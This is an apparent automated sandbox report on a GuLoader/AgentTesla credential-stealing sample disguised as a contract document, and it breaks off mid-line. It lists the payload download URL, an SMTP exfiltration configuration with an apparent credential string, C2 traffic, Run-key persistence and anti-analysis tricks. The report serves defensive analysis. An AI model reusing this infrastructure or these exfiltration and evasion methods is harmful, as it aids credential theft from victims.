
Windows Analysis Report Contract and PI of 1500W.exe

Overview

General Information

Sample Name:Contract and PI of 1500W.exe
Analysis ID:1651
MD5:dbceab5b0f79168ffea64f16bf7f1263
SHA1:c5c25d75233ea8523111b1f964fbd482be973cd7
SHA256:7d6174dce4980e71b083ae63d3b165b50b20855edb40ffa10a06a8e46e765cab

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Contract and PI of 1500W.exe (PID: 1404 cmdline: 'C:\Users\user\Desktop\Contract and PI of 1500W.exe' MD5: DBCEAB5B0F79168FFEA64F16BF7F1263)
    • RegAsm.exe (PID: 1388 cmdline: 'C:\Users\user\Desktop\Contract and PI of 1500W.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 1740 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 2904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 6460 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downl"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000002.00000002.278281355079.00000000022A0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: RegAsm.exe PID: 1388 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Process Memory Space: RegAsm.exe PID: 1388 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Sigma Overview

Networking:

Sigma detected: RegAsm connects to smtp port
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 65.60.11.90, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 1388, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49818

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: Contract and PI of 1500W.exe | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downl"}
Source: RegAsm.exe.1388.9.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1CD2DA50 CryptUnprotectData, 9_2_1CD2DA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1CD2E0FB CryptUnprotectData, 9_2_1CD2E0FB
Source: Contract and PI of 1500W.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49810 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49811 version: TLS 1.2
Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000F.00000002.278575001941.00000000008D2000.00000002.00020000.sdmp, DnDcR.exe, 00000011.00000002.278654263832.00000000007B2000.00000002.00020000.sdmp, DnDcR.exe.9.dr
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 4x nop then fsincos 2_2_004022C3
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 4x nop then fsincos 2_2_004031BE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49818 -> 65.60.11.90:587
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=downl
Source: Joe Sandbox View | ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ovq1830ci2vfc1r9jg3dm4bs2m26dfl/1634174850000/08714151441044389622/*/1iHaEbeRZQsul94yNukP5elwMyJtohxrw?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-10-4k-docs.googleusercontent.com Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.11.20:49818 -> 65.60.11.90:587
Source: global traffic | TCP traffic: 192.168.11.20:49818 -> 65.60.11.90:587
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp | String found in binary or memory: http://VpGUaC.com
Source: RegAsm.exe, 00000009.00000002.282780207491.00000000010C6000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 00000009.00000002.282780207491.00000000010C6000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000009.00000002.282791915175.000000001DF60000.00000004.00000001.sdmp | String found in binary or memory: http://friendsequipment.com
Source: RegAsm.exe, 00000009.00000002.282791915175.000000001DF60000.00000004.00000001.sdmp | String found in binary or memory: http://mail.friendsequipment.com
Source: RegAsm.exe, 00000009.00000003.279197125200.000000002115D000.00000004.00000001.sdmp | String found in binary or memory: http://www.microsoft.co
Source: RegAsm.exe, 00000009.00000002.282791915175.000000001DF60000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.279169743645.000000001CA71000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.282791482237.000000001DEFD000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.282792014580.000000001DF75000.00000004.00000001.sdmp | String found in binary or memory: https://TDIvwVTMK1.org
Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%4
Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000009.00000003.278253316698.000000000110F000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 00000009.00000002.282779842058.000000000107F000.00000004.00000020.sdmp | String found in binary or memory: https://doc-10-4k-docs.googleusercontent.com/U
Source: RegAsm.exe, 00000009.00000003.278253316698.000000000110F000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.278253365686.00000000010CB000.00000004.00000001.sdmp | String found in binary or memory: https://doc-10-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ovq1830
Source: RegAsm.exe, 00000009.00000002.282779842058.000000000107F000.00000004.00000020.sdmp | String found in binary or memory: https://doc-10-4k-docs.googleusercontent.com/~
Source: RegAsm.exe, 00000009.00000002.282779498827.0000000001038000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 00000009.00000002.282779364938.0000000000F40000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw
Source: RegAsm.exe, 00000009.00000002.282779498827.0000000001038000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw1f
Source: RegAsm.exe, 00000009.00000002.282779498827.0000000001038000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw9e
Source: RegAsm.exe, 00000009.00000002.282791056224.000000001DEA2000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 00000009.00000002.282792090697.000000001DF7D000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 00000009.00000002.282792090697.000000001DF7D000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 00000009.00000002.282792090697.000000001DF7D000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/v104
Source: RegAsm.exe, 00000009.00000002.282791056224.000000001DEA2000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: drive.google.com
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ovq1830ci2vfc1r9jg3dm4bs2m26dfl/1634174850000/08714151441044389622/*/1iHaEbeRZQsul94yNukP5elwMyJtohxrw?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-10-4k-docs.googleusercontent.com Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49810 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49811 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: Contract and PI of 1500W.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_004022C3
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_00403249
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_004032CA
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_004031BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CA3A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CA4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CAD490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CAC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CA3708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CB15F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CB6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00D5F1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00D594CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00D5BEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00D5951F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1CD22480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1CD2B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1CD2A928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1CD25E28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1CD2B070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1CD23DB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1CD2F130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1DCE5E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1DCE4ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1DCE6AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1DCE5E07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1DCE6AF1
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe | Code function: 15_2_008D3DFE
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe | Code function: 15_2_02CF09B0
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe | Code function: 17_2_007B3DFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00CA6A80 appears 52 times
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: String function: 0040177E appears 94 times
Source: Contract and PI of 1500W.exe, 00000002.00000002.278282493434.0000000002B50000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameFocalisi.exeFE2X vs Contract and PI of 1500W.exe
Source: Contract and PI of 1500W.exe, 00000002.00000002.278280053788.000000000041C000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFocalisi.exe vs Contract and PI of 1500W.exe
Source: Contract and PI of 1500W.exe | Binary or memory string: OriginalFilenameFocalisi.exe vs Contract and PI of 1500W.exe
Source: Contract and PI of 1500W.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe | Section loaded: edgegdi.dll
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
Source: Contract and PI of 1500W.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown | Process created: C:\Users\user\Desktop\Contract and PI of 1500W.exe 'C:\Users\user\Desktop\Contract and PI of 1500W.exe'
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Contract and PI of 1500W.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Contract and PI of 1500W.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Roaming\DnDcR
Source: classification engine | Classification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@8/6@3/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2904:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2904:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000F.00000002.278575001941.00000000008D2000.00000002.00020000.sdmp, DnDcR.exe, 00000011.00000002.278654263832.00000000007B2000.00000002.00020000.sdmp, DnDcR.exe.9.dr

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 00000002.00000002.278281355079.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_0040205A push cs; retf 2_2_004020FD
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_0040705F push edi; retf 2_2_004071E8
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_00408200 push FF3F4922h; retf 2_2_00408205
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_00406C0D pushad ; iretd 2_2_00406C1B
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_00407145 push edi; retf 2_2_004071E8
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_0040630D pushfd ; ret 2_2_00406318
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_004059F3 push esi; iretd 2_2_004059F7
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A3832 push esp; retn 000Dh 2_2_022A384D
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A2402 push esp; retn 004Fh 2_2_022A2405
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A106C push esp; retf 0079h 2_2_022A106D
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A3C62 push ecx; iretd 2_2_022A3C63
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A1863 push esp; retn 005Ch 2_2_022A1865
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A184B push esp; retn 005Ch 2_2_022A1865
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A0252 push esi; retn 0076h 2_2_022A0265
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A288A push cs; ret 2_2_022A2897
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A30F0 push edx; retf 2_2_022A30F8
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A4338 push si; retf 0016h 2_2_022A4345
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A4D60 push esp; retf 2_2_022A4D64
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A2B66 push esi; retf 0002h 2_2_022A2B69
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A334D push esp; retf 0047h 2_2_022A3395
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A4D43 push esp; retf 2_2_022A4D49
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A0B57 push esi; retn 007Dh 2_2_022A0B5D
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A47AA push esi; retn 0032h 2_2_022A47AD
Source: C:\Users\user\Desktop\Contract and PI of 1500W.exe | Code function: 2_2_022A2DDC push esp; retf 0069h 2_2_022A2DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CA66E1 push ebx; ret 9_2_00CA66EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CA4E78 push ebx; retf FE00h 9_2_00CA53A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CB43A0 push 9200CB3Eh; retf 9_2_00CB43A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00CB0360 push es; retf 9_2_00CB077E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00D54DD6 push ecx; iretd 9_2_00D54DDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00D54DF5 push ecx; iretd 9_2_00D54DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00D5261F push edi; retn 0000h 9_2_00D52621
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcR

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppDat